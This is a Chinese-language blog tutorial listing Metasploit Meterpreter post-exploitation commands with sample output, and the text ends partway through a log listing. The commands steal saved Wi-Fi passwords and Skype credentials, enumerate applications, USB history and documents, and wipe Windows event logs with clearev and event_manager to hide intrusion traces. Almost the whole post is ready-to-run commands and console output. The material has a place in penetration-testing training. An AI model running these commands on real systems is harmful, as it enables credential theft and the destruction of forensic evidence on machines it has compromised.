Metasploit之——其他后渗透模块

原创

冰河技术 2022-04-22 16:40:52 ©著作权

文章标签 渗透 Metasploit ide 目标系统查找文件 文章分类 网络安全

©著作权归作者所有：来自51CTO博客作者冰河技术的原创作品，请联系作者获取转载授权，否则将追究法律责任

1.收集无线SSID信息

run post/windows/wlan/wlan_bss_list

meterpreter > run post/windows/wlan/wlan_bss_list

2.收集无线Wifi密码

run post/windows/wlan/wlan_profile

可以收集目标系统上保存的Wifi登录凭证。

meterpreter > run post/windows/wlan/wlan_profile

3.获取应用程序列表

run get_application_list

meterpreter > run get_application_list

[!] Meterpreter scripts are deprecated. Try post/windows/gather/enum_applications.
[!] Example: run post/windows/gather/enum_applications OPTION=value [...]

Installed Applications
======================

 Name                                                            Version
 ----                                                            -------
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148  9.0.30729.4148
 Radmin Server 3.5                                               3.50.0000
 WebFldrs XP                                                     9.50.7523


meterpreter >

4.获取Skype密码

run post/windows/gather/credentials/skype

meterpreter > run post/windows/gather/credentials/skype

5.获取USB使用历史信息

run post/windows/gather/usb_history

meterpreter > run post/windows/gather/usb_history

[*] Running module against LIUYAZHUANG
[*] 
   D: IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   E:                                                              Disk 31ac31ab 

[-] No USB devices appear to have been connected to this host.
meterpreter >

利用这个模块可以轻松的伪造USB描述符合硬件ID

6.查找文件

meterpreter > search -f *.doc
Found 6 results...
    c:\Documents and Settings\Default User\Templates\winword.doc (4608 bytes)
    c:\Documents and Settings\Default User\Templates\winword2.doc (1769 bytes)
    c:\Documents and Settings\lyz\Templates\winword.doc (4608 bytes)
    c:\Documents and Settings\lyz\Templates\winword2.doc (1769 bytes)
    c:\WINDOWS\system32\config\systemprofile\Templates\winword.doc (4608 bytes)
    c:\WINDOWS\system32\config\systemprofile\Templates\winword2.doc (1769 bytes)
meterpreter >

7.清除目标系统上的日志

clearev

meterpreter > clearev
[*] Wiping 190 records from Application...
[*] Wiping 286 records from System...

另一个用来处理日志的模块就是event_manager

meterpreter > run event_manager 
Meterpreter Script for Windows Event Log Query and Clear.

OPTIONS:

    -c <opt>  Clear a given Event Log (or ALL if no argument specified)
    -f <opt>  Event ID to filter events on
    -h        Help menu
    -i        Show information about Event Logs on the System and their configuration
    -l <opt>  List a given Event Log.
    -p        Supress printing filtered logs to screen
    -s <opt>  Save logs to local CSV file, optionally specify alternate folder in which to save logs

meterpreter > 
meterpreter > run event_manager -i
[*] Retriving Event Log Configuration

Event Logs on System
====================

 Name                   Retention  Maximum Size  Records
 ----                   ---------  ------------  -------
 Application            Disabled   524288K       0
 Security               Disabled   524288K       Access Denied
 System                 Disabled   524288K       0
 ThinPrint Diagnostics  Disabled   K             1


meterpreter > run event_manager -c
[-] You must specify and eventlog to query!
[*] Application: 
[*] Clearing Application
[*] Event Log Application Cleared!
[*] Security: 
[*] Clearing Security
[-] Failed to Clear Security, Access Denied
[*] System: 
[*] Clearing System
[*] Event Log System Cleared!
[*] ThinPrint Diagnostics: 
[*] Clearing ThinPrint Diagnostics
[*] Event Log ThinPrint Diagnostics Cleared!
meterpreter > 
meterpreter > 
meterpreter > run event_manager -i
[*] Retriving Event Log Configuration

Event Logs on System